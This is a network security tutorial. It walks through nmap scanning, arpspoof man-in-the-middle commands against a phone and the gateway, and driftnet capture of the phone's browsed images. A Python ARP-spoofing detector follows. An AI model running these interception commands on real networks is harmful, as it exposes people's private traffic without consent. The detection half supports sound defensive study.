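Preface:
Arpspoof is a packet interception and forwarding tool that can be used for spoofing inside a LAN, letting the user launch ARP-based disconnection attacks and take over bandwidth.
Driftnet is a simple and practical image capture tool that can easily extract images from network packets. It can capture images from specified packets both in real time and offline, and it is of course included in Kali.
1. Use nmap to scan the subnet for live hosts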
# nmap -sP 192.168.1.100/24
Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-15 22:18 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0089s latency).
MAC Address: D8:15:0D:EF:57:D6 (Tp-link Technologies)
Nmap scan report for 192.168.1.100
Host is up (0.0040s latency).
MAC Address: 8C:F2:28:AA:CE:23 (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.1.102
Host is up (0.032s latency).
MAC Address: 04:15:52:12:69:8F (Apple)
Nmap scan report for 192.168.1.104
Host is up (0.12s latency).
MAC Address: 60:F8:1D:8A:15:DB (Apple)
Nmap scan report for 192.168.1.111
Host is up (0.024s latency).
MAC Address: 50:7A:55:2A:33:15 (Apple)
Nmap scan report for 192.168.1.114
Host is up (0.23s latency).
MAC Address: 9C:99:A0:48:99:51 (Xiaomi Communications)
Nmap scan report for 192.168.1.116
Host is up (0.10s latency).
MAC Address: 54:E4:3A:E0:FA:78 (Apple)
Nmap scan report for 192.168.1.118
Host is up (0.017s latency).
MAC Address: 2A:F7:6A:40:4D:78 (Unknown)
Nmap scan report for 192.168.1.123
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 6.07 seconds
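2. Enable IP forwarding on the Kali system
# echo "1" > /proc/sys/net/ipv4/ip_forward
3. Find the IP of the phone to sniff and perform ARP spoofing. Packets that host 192.168.1.106 sends to 192.168.1.1 are sent to the Kali host first and then forwarded by it.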
# arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1
4. Packets that the router sends back to host 192.168.1.106 are sent to the Kali host first and then forwarded by this machine.
# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.106
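5. Start driftnet to monitor the traffic. A monitoring window pops up, and when web pages are then browsed on the phone, the images viewed by the target host are displayed in it.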
# driftnet -i wlan0
/tmp/drifnet-UIsrmU is where captured images are saved by default.
View driftnet's options:
# driftnet -help
driftnet, version 1.1.5
Capture images from network traffic and display them in an X window.
Synopsis: driftnet [options] [filter code]
Options:
-h Display this help message.
-v Verbose operation.
-b Beep when a new image is captured.
-i interface Select the interface on which to listen (default: all interfaces).
-f file Instead of listening on an interface, read captured
packets from a pcap dump file; file can be a named pipe for use with Kismet or similar.
-p Do not put the listening interface into promiscuous mode.
-a Adjunct mode: do not display images on screen, but save
them to a temporary directory and announce their names on
standard output.
-m number Maximum number of images to keep in temporary directory in adjunct mode.
-d directory Use the named temporary directory.
-x prefix Prefix to use when saving images.
-s Attempt to extract streamed audio data from the network,
in addition to images. At present this supports MPEG data
only.
-S Extract streamed audio but not images.
-M command Use the given command to play MPEG audio data extracted
with the -s option; this should process MPEG frames
supplied on standard input. Default: `mpg123 -'.
Sun May 15 22:21:36 2016 [driftnet]
warning: image data too small (49 bytes) to bother with
Images smaller than 49 bytes will not be displayed.
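Steps 3 and 4 put forged ARP replies on the wire in which one MAC address claims both the gateway's IP and the phone's IP. The following is an added example, not part of the original post, of arpwatch-style detection over raw ARP frames: it flags an IP whose MAC binding changes and a MAC that claims several IPs. The gateway MAC is taken from the nmap output above; the two 02:00:... MACs, the build() helper and the SAMPLE frames are constructed for illustration.

```python
from collections import defaultdict

ARP_HDR = b"\x08\x06\x00\x01\x08\x00\x06\x04"  # EtherType ARP, Ethernet/IPv4, hlen 6, plen 4

def _mac(b): return ":".join(f"{x:02x}" for x in b)
def _ip(b): return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (sender_mac, sender_ip) from an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:20] != ARP_HDR:
        return None
    return _mac(frame[22:28]), _ip(frame[28:32])

def detect(frames):
    """Flag IP->MAC bindings that change and MACs that claim several IPs."""
    first_seen, claims, alerts = {}, defaultdict(set), []
    for f in frames:
        if (parsed := parse_arp(f)) is None:
            continue
        smac, sip = parsed
        known = first_seen.setdefault(sip, smac)      # first MAC seen for this IP
        alert = ("binding-changed", sip, known, smac)
        if known != smac and alert not in alerts:     # arpspoof repeats; report once
            alerts.append(alert)
        claims[smac].add(sip)
    for m, ips in sorted(claims.items()):
        if len(ips) > 1:
            alerts.append(("multi-ip", m, sorted(ips)))
    return alerts

def build(op, smac, sip, tmac, tip):
    """Construct a 42-byte ARP frame for the sample below (test data only)."""
    hx = lambda m: bytes.fromhex(m.replace(":", ""))
    ipb = lambda a: bytes(int(o) for o in a.split("."))
    return (hx(tmac) + hx(smac) + ARP_HDR + op.to_bytes(2, "big")
            + hx(smac) + ipb(sip) + hx(tmac) + ipb(tip))

GW = "d8:15:0d:ef:57:d6"       # 192.168.1.1, MAC from the nmap output on this page
PHONE = "02:00:00:00:00:6a"    # constructed MAC for 192.168.1.106
KALI = "02:00:00:00:00:7b"     # constructed MAC for the spoofing host
SAMPLE = [                     # constructed capture, ARP replies (op 2)
    build(2, GW, "192.168.1.1", PHONE, "192.168.1.106"),    # genuine gateway reply
    build(2, PHONE, "192.168.1.106", GW, "192.168.1.1"),    # genuine phone reply
    build(2, KALI, "192.168.1.1", PHONE, "192.168.1.106"),  # forged: gateway IP, Kali MAC
    build(2, KALI, "192.168.1.106", GW, "192.168.1.1"),     # forged: phone IP, Kali MAC
]

if __name__ == "__main__":
    print(*detect(SAMPLE), sep="\n")
```

On a real network the frames would come from a capture on the monitored segment, and DHCP lease changes can also trigger the binding-changed alert, so alerts on the gateway's IP deserve the most weight.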